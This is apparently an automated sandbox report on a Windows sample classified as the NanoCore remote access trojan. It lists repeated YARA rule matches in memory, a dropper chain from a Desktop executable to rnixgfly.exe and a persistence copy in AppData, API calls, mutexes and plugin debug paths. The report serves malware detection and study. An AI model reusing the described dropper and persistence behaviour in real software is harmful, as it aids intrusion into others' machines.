    Source: 00000002.00000002.503941570.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 656
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00406D5F0_2_00406D5F
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040CCEA1_2_0040CCEA
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040DA1A1_2_0040DA1A
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040D23B1_2_0040D23B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040EEC01_2_0040EEC0
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040C7991_2_0040C799
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_00480F9C1_2_00480F9C
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0048125D1_2_0048125D
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_0040CBD12_2_0040CBD1
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_05D602B02_2_05D602B0
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: String function: 00401EE0 appears 33 times
    Source: fyTwP4SHWF.exeReversingLabs: Detection: 51%
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeFile read: C:\Users\user\Desktop\fyTwP4SHWF.exeJump to behavior
    Source: fyTwP4SHWF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\fyTwP4SHWF.exe C:\Users\user\Desktop\fyTwP4SHWF.exe
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess created: C:\Users\user\AppData\Local\Temp\rnixgfly.exe "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess created: C:\Users\user\AppData\Local\Temp\rnixgfly.exe C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe "C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
    Source: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 656
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe "C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
    Source: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 628
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess created: C:\Users\user\AppData\Local\Temp\rnixgfly.exe "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rtJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess created: C:\Users\user\AppData\Local\Temp\rnixgfly.exe C:\Users\user~1\AppData\Local\Temp\rnixgfly.exeJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeFile created: C:\Users\user\AppData\Roaming\ilkqegcyJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsvBAAB.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@9/17@20/2
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5880
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{7dcf7c5d-e4be-40f9-826b-505d43864bde}
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4528
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_0040147B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: GetTickCount1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Kernel32.dll1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Kernel32.dll1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Sleep1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Kernel32.dll1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: VirtualAlloc1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Kernel32.dll1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Notepad1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Notepad1_2_00402571
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCommand line argument: Notepad1_2_00402571
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: fyTwP4SHWF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\xampp\htdocs\33e7f28c8a384f9f8b302c3296aa65f3\Loader\Release\Loader.pdb source: fyTwP4SHWF.exe, 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmp, fyTwP4SHWF.exe, 00000000.00000002.253928121.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmp, rnixgfly.exe, 00000001.00000000.238095500.0000000000410000.00000002.00000001.01000000.00000004.sdmp, rnixgfly.exe, 00000001.00000002.249127732.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000000.241176736.0000000000410000.00000002.00000001.01000000.00000004.sdmp, jfcarlsrvb.exe, 00000003.00000000.263703870.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000003.00000002.287251296.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000007.00000000.283385177.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000007.00000002.292565762.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe.1.dr, rnixgfly.exe.0.dr, nsvBAAC.tmp.0.dr
    Source: Binary string: wntdll.pdbUGP source: rnixgfly.exe, 00000001.00000003.241263782.0000000002370000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000003.247105696.000000001A5D0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: rnixgfly.exe, 00000001.00000003.241263782.0000000002370000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000003.247105696.000000001A5D0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: rnixgfly.exe, 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: rnixgfly.exe, 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: rnixgfly.exe, 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeUnpacked PE file: 2.2.rnixgfly.exe.400000.0.unpack
